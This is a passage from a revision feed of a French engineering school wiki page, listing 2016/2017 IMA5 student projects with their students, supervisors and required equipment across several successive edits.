&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P54 Robot assisté par vision pour le tri de pièces métalliques]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julian BONVILLE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P15&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; 2 téléphones Android (reçus le 30 septembre. Une boite complète + 1 boite sans câble de connexion) &amp;lt;/span&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33811</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33811"/>
				<updated>2016-10-02T12:30:39Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P56 Robot testeur de club de golf]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Joshua LETELLIER &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) / Guillaume DEWAELE (Entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P61 Jeux d'aventure grandeur nature ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; MAIA Stéphane / LENTIEUL Romuald &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; GAPAS / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P54 Robot assisté par vision pour le tri de pièces métalliques]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julian BONVILLE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P15&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; 2 téléphones Android (reçus le 30 septembre. Une boite complète + 1 boite sans câble de connexion) &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33708</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33708"/>
				<updated>2016-09-26T11:55:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
